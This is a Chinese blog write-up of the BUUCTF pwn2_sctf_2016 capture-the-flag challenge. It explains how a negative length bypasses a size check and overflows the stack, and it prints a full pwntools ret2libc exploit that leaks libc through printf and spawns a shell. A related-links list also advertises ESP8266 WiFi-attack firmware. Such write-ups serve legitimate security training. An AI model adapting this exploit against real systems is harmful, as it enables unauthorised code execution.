BUUCTF-Pwn-pwn2_sctf_2016

最新推荐文章于 2023-04-18 19:24:54 发布
最新推荐文章于 2023-04-18 19:24:54 发布
阅读量200 收藏
点赞数
分类专栏: CTF Pwn 文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46035101/article/details/123406504
版权
CTF 同时被 2 个专栏收录
29 篇文章 0 订阅
订阅专栏
Pwn
21 篇文章 0 订阅
订阅专栏

题目截图
在这里插入图片描述
例行检查
在这里插入图片描述
有符号转无符号造成漏洞,输入-1就能绕过if,转换成无符号数又会造成栈溢出
在这里插入图片描述
利用printf函数泄露libc,常规流程
exp

from pwn import*
from LibcSearcher import *
elf=ELF('/home/lhb/桌面/pwn2_sctf_2016')
p=remote('node4.buuoj.cn',27385) 
printf_plt=elf.plt['printf']
printf_got=elf.got['printf']
main=0x80485b8

p.sendlineafter(b'read? ',b'-1')

payload=b'a'*(0x2c+4)+p32(printf_plt)+p32(main)+p32(printf_got)
p.sendlineafter(b'data!\n',payload)

p.recvuntil(b'\n')
addr=u32(p.recv(4))
libc=LibcSearcher('printf',addr)
libcbase=addr-libc.dump('printf')
system=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')

p.sendlineafter(b'read? ',b'-1')

payload=b'a'*(0x2c+4)+p32(system)+p32(main)+p32(bin_sh)
p.sendlineafter(b'data!\n',payload)

p.interactive()
餐桌上的猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2488
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 929
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF Pwn pwn2_sctf_2016
MrTreebook的博客
03-13 301
BUUCTF Pwn pwn2_sctf_20161.checksec2.IDA32vuln函数漏洞利用3.exp 1.checksec 没有canary,方便溢出 没有PIE,构造ROP会方便很多 2.IDA32 vuln函数 int vuln() { char nptr[32]; // [esp+1Ch] [ebp-2Ch] BYREF int v2; // [esp+3Ch] [ebp-Ch] printf("How many bytes do you want me to rea
buuctf pwn2_sctf_2016
qq_42728977的博客
03-21 621
pwn2_sctf_2016 degree of difficulty: 2 source of the challenges:buuctf/sctf_2016 solving ideas:Stack overslow,atoi-function’s negative number overslow Put it in IDA32,we can see this easy program. l...
BUUCTF pwn2_sctf2016
红叶的博客
11-01 472
本题难点:绕过字符串大小限制以及是否掌握了ret2libc。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 315
BUUCTF 做题练习
pwn2_sctf_2016【BUUCTF】
qq_41696518的博客
09-01 520
pwn2_sctf_2016【BUUCTF】
pwn2_sctf_2016
、moddemod
06-20 307
exp #!/usr/bin/env python # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './pwn2_sctf_2016' p = process(proc_name) # p = remote('node3.buuoj.cn', 26254) elf = ELF(proc_name) p.sendlineafter('read?', '-.
【CTF】pwn2_sctf_2016
凉水的博客
07-16 868
pwn2_sctf_2016
mqtt-pwn安装
最新发布
09-20
2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值